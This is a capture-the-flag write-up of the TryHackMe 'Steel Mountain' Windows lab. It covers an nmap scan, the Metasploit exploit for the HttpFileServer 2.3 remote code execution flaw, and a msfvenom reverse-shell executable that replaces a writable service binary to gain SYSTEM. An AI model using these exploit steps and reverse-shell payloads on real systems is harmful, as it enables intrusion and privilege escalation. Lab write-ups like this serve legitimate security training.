Writeup Tryhackme Steel Mountain
This is the first post about Tryhackme. A guided and more relaxed hacking platform than htb, in my opinion.
I am totally new on this hacking platform and I am doing the path Offensive Pentesting Advanced exploitation just for fun. I am not sure if tryhackme allows to post Writeups, because I could not find any information about this, so if it is forbidden please contact me.
Note: Some sensitive information like IPs and full flags are replaced with π also the answers are not on the tryhackme format. Just to sleep better.
So go ahead, the writeup.
0 - Basic info
Windows machine
1 - Reconnaissance and enumeration
Starting with a nmap scan:
sudo nmap -sS -sV -sC -O -p- --script vuln 10.10.π
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:46 CEST
Nmap scan report for 10.10.π
Host is up (0.040s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp open http HttpFileServer httpd 2.3
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
| http://www.mkit.com.ar/labs/htexploit/
| https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_ http://capec.mitre.org/data/definitions/274.html
|_http-server-header: HFS 2.3
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=80%CT=1%CU=36036%PV=Y%DS=2%DC=I%G=Y%TM=60AE707
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5
OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 823.86 seconds
So there are several ports open, 80, 135, 139, 445, 3389, 5985, 47001. Just browsing to the site on the default port 80
Just looking to the page source code:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Steel Mountain</title>
<style>
* {font-family: Arial;}
</style>
</head>
<body><center>
<a href="index.html"><img src="/img/logo.png" style="width:500px;height:300px;"/></a>
<h3>Employee of the month</h3>
<img src="/img/BillHarper.png" style="width:200px;height:200px;"/>
</center>
</body>
</html>
Using the browser to check what is inside the port 8080:
Here we got the exact version HttpFileServer 2.3, clicking on the version link points to http://www.rejetto.com/hfs/
2 - Vulnerability Identification
So a quick search reveals that it is vulnerable to RCE:
searchsploit httpfileserver
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
Shellcodes: No Results
Also there is a Metasploit module.
Checking the exploit:
https://www.exploit-db.com/exploits/49125
The CVE is:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
3 - Exploit
Using this time Metasploit to take it easy and live longer. I will try to mix the use of Metasploit and the manual exploitation depending on the energy I have on the day.
This is the module used with the configuration and payload set:
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.π yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST π yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Pressing the big button and starting the exploit:
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on π :4444
[*] Using URL: http://0.0.0.0:8080/TtG31N2LZQ
[*] Local IP: http://192.168.1.84:8080/TtG31N2LZQ
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /TtG31N2LZQ
[*] Sending stage (175174 bytes) to 10.10.π
[!] Tried to delete %TEMP%\MUTmQHFQQU.vbs, unknown result
[*] Meterpreter session 3 opened (π :4444 -> 10.10.π:49254) at 2021-05-26 18:07:54 +0200
[*] Server stopped.
Worked, so looting the user flag.
C:\Users\bill\Desktop
user.txt
b047π
4 - Post-Exploitation and privilege eescalation
Now is time to get root. I did not use the recommended tool PowerUp I used WinPEAS:
https://github.com/carlospolop/privilege-eescalation-awesome-scripts-suite/tree/master/winPEAS
[+] Interesting Services -non Microsoft-
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-eescalation#services
AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected
File Permissions: bill [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteData/CreateFiles])
Advanced SystemCare Service
So the service AdvancedSystemCareService9 is running with no quotes and space detected, also the file is writtable so my approach was just to replace the file, with a reverse shell executable.
msf6 exploit(windows/http/rejetto_hfs_exec) > msfvenom -p windows/shell_reverse_tcp LHOST=π LPORT=4433 -e x86/shikata_ga_nai -f exe -o ASCService.exe
After that a listener is needed. So I used the metasploit module multi/handler to manage the meterpreter shell windows/meterpreter/reverse_tcp
With the .exe generated I just uploaded it to the server with meterpreter and stopped the service.
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Stopped first because it will show an error if you try to replace the .exe file service, ASCService.exe when it is still running.
Copying the .exe generated and replacing the service file:
C:\Program Files (x86)\IObit\Advanced SystemCare>copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
Yes
1 file(s) copied.
Starting again the service to trigger the .exe with the reverse shell:
C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED with error 216.
When the server is started again the reverse shell is completed
Finally getting the admin flag:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd /users/administrator/desktop
meterpreter > cat root.txt
9af5π
Thanks for reading!